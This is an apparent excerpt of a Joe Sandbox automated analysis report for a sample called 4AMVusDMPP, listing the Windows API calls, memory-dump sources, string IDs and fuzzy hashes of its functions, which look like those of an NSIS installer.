                                                          • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                          • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                          • GetLastError.KERNEL32 ref: 00405976
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                          • GetLastError.KERNEL32 ref: 00405995
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID:
                                                          • API String ID: 3449924974-0
                                                          • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                          • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                          APIs
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0,00000000), ref: 00405D76
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0,00000000), ref: 00405E1E
                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0), ref: 00405E2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: 0_B
                                                          • API String ID: 3248276644-2128305573
                                                          • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                          • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004053F3
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                            • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                          • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405F2B
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,774D3420,004036EF), ref: 00405F46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                          • CloseHandle.KERNEL32(?), ref: 00405A07
                                                          Strings
                                                          • Error launching installer, xrefs: 004059E4
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                          • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                          • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                          • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                          • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                          • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                          • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                          • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                          • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                          • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                          • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                          • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                          • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                          • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                          • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                          • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                          • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                          • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                          • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                          • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                          • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                          • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq$Xq$Xq
                                                          • API String ID: 0-3965792415
                                                          • Opcode ID: d4f49f1898b9e8e1ffa8e58c8a24a70bd9e33761781210a472715675026092a9
                                                          • Instruction ID: 435a1ffe242eab72f3cd801214cb03aa0a1978e0a3f5993dabb5fda7fe255e8d
                                                          • Opcode Fuzzy Hash: d4f49f1898b9e8e1ffa8e58c8a24a70bd9e33761781210a472715675026092a9
                                                          • Instruction Fuzzy Hash: A531D470E0136E9FDF648BB48C4536EB7B6AF84300F1940A9C80AE7251EB708D90CB92
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                          • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98